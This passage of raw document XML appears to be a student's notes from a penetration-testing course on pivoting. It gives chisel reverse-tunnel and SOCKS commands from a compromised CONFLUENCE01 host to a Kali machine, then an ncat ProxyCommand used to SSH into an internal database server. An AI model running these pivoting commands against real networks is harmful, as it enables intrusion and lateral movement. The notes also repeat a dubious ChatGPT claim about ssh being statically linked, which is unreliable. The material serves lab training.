          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This will connect CONFLUENCE01 (Chisel Client) to our Kali (Chisel Server)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A22">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A23">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Note:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A24">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="843"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Another chisel client syntax I've seen is this:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A25">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="843"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chisel.exe client 192.168.119.5:8080 R:80:172.16.6.241:80</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A26">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="843"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is from </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">XXXXXXXXX 27.4.2. Services and Sessions</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A27">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="843"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Although this is chisel.exe so maybe syntax is different</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A28">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="843"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is an example of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">single reverse port forwarding</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, not dynamic</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A29">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="843"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We'll create a reverse port forward with the syntax </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">R:localport:remotehost:remoteport</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. In our case, the remote host and port are 172.16.6.241 and 80. The local port we want to utilize is 80.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A2A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="843"/>
        </w:numPr>
        <w:ind w:left="2160" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Note that the local IP is implicit here, since we didn't include it, so it defaults to 127.0.0.1. If we wanted explicit, it would be:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A2B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="843"/>
        </w:numPr>
        <w:ind w:left="2880" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chisel.exe client 192.168.119.5:8080 R:127.0.0.1:80:172.16.6.241:80</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A2C">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If you go back to your chisel server command, you should see that our Chisel server has logged an inbound connection.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A2D">
      <w:pPr>
        <w:spacing w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1625600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="250" name="image249.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image249.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20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A2E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="87"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chisel server --port 8080 --reverse</w:t>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t xml:space="preserve">Now, we can check the status of our SOCKS proxy with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ss</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2273300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="551" name="image240.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image240.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20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A33">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1338"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ss -ntplu</w:t>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t xml:space="preserve">If you see that we are now listening on local host port 1080, that means our SOCKS proxy is listening now!</w:t>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t xml:space="preserve">If you don't see any Chisel server output, look at the "How to debug Chisel problems" section below to troubleshoot. If you see output and the port looks good, then you can proceed in this section.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A38">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Let's use this to connect to the SSH server on PGDATABASE01</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. In </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Port Redirection and SSH Tunneling</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we created SOCKS proxy ports with both SSH remote and classic dynamic port forwarding and used Proxychains to push non-SOCKS-native tools through the tunnel. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">But we've not yet actually run SSH itself through a SOCKS proxy. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A39">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="795"/>
        </w:numPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">According to chatGPT, </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">you can't even run SSH through proxychains if we wanted to</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> since SSH (/usr/bin/ssh) is a statically linked binary on Kali (and many other distros), or it may perform operations early in execution that bypass proxychains’ hooks. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Statically linked binary don't work on proxychains. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">So, you have to run SSH this way if you want it to run it through a SOCKS proxy</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A3A">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SSH doesn't offer a generic SOCKS proxy command-line option. Instead, it offers the</w:t>
      </w:r>
      <w:hyperlink r:id="rId210">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId211">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">ProxyCommand</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> configuration option. We can either write this into a configuration file, or pass it as part of the command line with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-o</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A3B">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:hyperlink r:id="rId212">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">ProxyCommand</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> accepts a shell command that is used to open a proxy-enabled channel. The documentation suggests using the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">OpenBSD</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> version of Netcat, which exposes the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">-X</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> flag and can connect to a SOCKS or HTTP proxy. However, the version of Netcat that ships with Kali doesn't support proxying.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A3C">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Instead, we'll use</w:t>
      </w:r>
      <w:hyperlink r:id="rId213">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId214">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:i w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Ncat</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, the Netcat alternative written by the maintainers of Nmap. We can install this on Kali with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo apt install ncat</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A3D">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo apt install ncat</w:t>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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Now we'll pass an Ncat command to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ProxyCommand</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. The command we construct tells Ncat to use the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">socks5</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> protocol and the proxy socket at </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">127.0.0.1:1080</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. The </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">%h</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">%p</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> tokens represent the SSH command host and port values, which SSH will fill in before running the command.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A40">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3454400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="282" name="image274.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image274.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId215"/>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A41">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="635"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">ssh -o ProxyCommand='ncat --proxy-type socks5 --proxy 127.0.0.1:1080 %h %p' database_admin@10.4.50.215</w:t>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spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Very nice! We gained access to the SSH server, through our Chisel reverse SOCKS proxy, tunneling traffic through a reverse HTTP tunnel.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A44">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In this Learning Unit, we created a reverse tunnel using Chisel, and then used this tunnel to log in to an SSH server on PGDATABASE01 within the internal network. We did this with only HTTP-formatted traffic to and from the compromised CONFLUENCE01 pivot server.</w:t>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pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_zbfxwknx216z" w:id="89"/>
      <w:bookmarkEnd w:id="89"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to debug Chisel problems</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A48">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A49">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">However, nothing happens. We don't see any traffic hit our Tcpdump session, and the Chisel server output doesn't show any activity.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A4A">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This indicates there may be something wrong with the way we're running the Chisel client process on CONFLUENCE01. However, we don't have direct access to the error output when running the binary. We need to figure out a way to read the command output, which may be able to point us towards the problem. We should then be able to solve it.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000A4B">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">To read the command output, we can construct a command which redirects stdout and stderr output to a file, and then send the contents of that file over HTTP back to our Kali machine. We use the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&amp;&gt;</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> operator, which directs all streams to stdout, and write it to </w:t>
      </w:r>
